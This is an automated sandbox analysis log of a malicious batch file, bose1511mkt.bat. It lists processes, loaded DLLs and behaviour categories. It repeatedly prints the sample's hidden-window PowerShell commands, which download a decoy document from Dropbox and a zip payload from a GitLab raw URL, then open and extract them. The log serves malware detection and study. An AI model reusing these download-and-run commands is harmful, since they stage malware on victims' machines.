            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I set "C:\Users\user\Desktop\bose1511mkt.bat"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I goto "C:\Users\user\Desktop\bose1511mkt.bat"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I echo "C:\Users\user\Desktop\bose1511mkt.bat"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I pause "C:\Users\user\Desktop\bose1511mkt.bat"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c type tmp
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe fINd
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c type tmp
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/e2xjf5lc4ozmjfx1xvbkr/16_Advertising_Campaign_and_Collaboration.docx?rlkey=gqzq7m8iwlwtriryr5u9inan8&st=5dnoyqbj&dl=1', 'C:\Users\user\AppData\Local\Temp\\16_Advertising_Campaign_and_Collaboration.docx')"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\\16_Advertising_Campaign_and_Collaboration.docx'"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/bose1511/mkt1511/-/raw/main/16Fukrun.zip', 'C:\Users\Public\Document.zip')"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp.com 437Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe fIndJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I set "C:\Users\user\Desktop\bose1511mkt.bat"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I goto "C:\Users\user\Desktop\bose1511mkt.bat"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I echo "C:\Users\user\Desktop\bose1511mkt.bat"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I pause "C:\Users\user\Desktop\bose1511mkt.bat"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c type tmpJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe fINdJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c type tmpJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/e2xjf5lc4ozmjfx1xvbkr/16_Advertising_Campaign_and_Collaboration.docx?rlkey=gqzq7m8iwlwtriryr5u9inan8&st=5dnoyqbj&dl=1', 'C:\Users\user\AppData\Local\Temp\\16_Advertising_Campaign_and_Collaboration.docx')"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\\16_Advertising_Campaign_and_Collaboration.docx'"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/bose1511/mkt1511/-/raw/main/16Fukrun.zip', 'C:\Users\Public\Document.zip')"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')"Jump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
            Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
            Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
            Source: C:\Windows\System32\find.exeSection loaded: ulib.dllJump to behavior
            Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dllJump to behavior
            Source: C:\Windows\System32\find.exeSection loaded: ulib.dllJump to behavior
            Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dlnashext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wpdshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: Binary string: C:\Users\Vinay\Projects\simple_launcher\dist\t64.pdb source: powershell.exe, 00000013.00000002.3330232690.000001E0D9B41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3330232690.000001E0D9A6A000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: tomation.pdb source: powershell.exe, 0000000C.00000002.2229489237.000001F11CCEC000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb^ source: powershell.exe, 0000000C.00000002.2249574202.000001F136EAD000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000C.00000002.2249574202.000001F136EAD000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 0000000C.00000002.2249574202.000001F136F25000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: bpdbtem.pdb source: powershell.exe, 0000000C.00000002.2248528679.000001F136BE2000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: and f.endswith(('.exe', '.pdb'))): source: powershell.exe, 00000013.00000002.3330232690.000001E0D83B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3330232690.000001E0D83C3000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: em.pdbK source: powershell.exe, 0000000C.00000002.2249574202.000001F136F25000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: em.pdb source: powershell.exe, 0000000C.00000002.2249574202.000001F136F25000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: if not srcfile.endswith(('.exe', '.pdb')): source: powershell.exe, 00000013.00000002.3330232690.000001E0D83B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3330232690.000001E0D83C3000.00000004.00000800.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            Source: Yara matchFile source: bose1511mkt.bat, type: SAMPLE
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/e2xjf5lc4ozmjfx1xvbkr/16_Advertising_Campaign_and_Collaboration.docx?rlkey=gqzq7m8iwlwtriryr5u9inan8&st=5dnoyqbj&dl=1', 'C:\Users\user\AppData\Local\Temp\\16_Advertising_Campaign_and_Collaboration.docx')"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\\16_Advertising_Campaign_and_Collaboration.docx'"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/bose1511/mkt1511/-/raw/main/16Fukrun.zip', 'C:\Users\Public\Document.zip')"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/e2xjf5lc4ozmjfx1xvbkr/16_Advertising_Campaign_and_Collaboration.docx?rlkey=gqzq7m8iwlwtriryr5u9inan8&st=5dnoyqbj&dl=1', 'C:\Users\user\AppData\Local\Temp\\16_Advertising_Campaign_and_Collaboration.docx')"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\\16_Advertising_Campaign_and_Collaboration.docx'"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/bose1511/mkt1511/-/raw/main/16Fukrun.zip', 'C:\Users\Public\Document.zip')"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFD345400BD pushad ; iretd 12_2_00007FFD345400C1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFD34547047 push esp; retf 12_2_00007FFD34547048
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FFD345300BD pushad ; iretd 14_2_00007FFD345300C1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FFD34530695 push eax; retf 14_2_00007FFD345306AD
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FFD34530347 push esi; retf 14_2_00007FFD34530376
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FFD34530327 pushad ; retf 14_2_00007FFD34530346
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FFD34530108 push ds; retf 14_2_00007FFD345301B6
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FFD3453018D push ds; retf 14_2_00007FFD345301B6
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00007FFD345400BD pushad ; iretd 19_2_00007FFD345400C1

            Persistence and Installation Behavior

            barindex
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/e2xjf5lc4ozmjfx1xvbkr/16_Advertising_Campaign_and_Collaboration.docx?rlkey=gqzq7m8iwlwtriryr5u9inan8&st=5dnoyqbj&dl=1', 'C:\Users\user\AppData\Local\Temp\\16_Advertising_Campaign_and_Collaboration.docx')"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/bose1511/mkt1511/-/raw/main/16Fukrun.zip', 'C:\Users\Public\Document.zip')"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/e2xjf5lc4ozmjfx1xvbkr/16_Advertising_Campaign_and_Collaboration.docx?rlkey=gqzq7m8iwlwtriryr5u9inan8&st=5dnoyqbj&dl=1', 'C:\Users\user\AppData\Local\Temp\\16_Advertising_Campaign_and_Collaboration.docx')"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/bose1511/mkt1511/-/raw/main/16Fukrun.zip', 'C:\Users\Public\Document.zip')"Jump to behavior
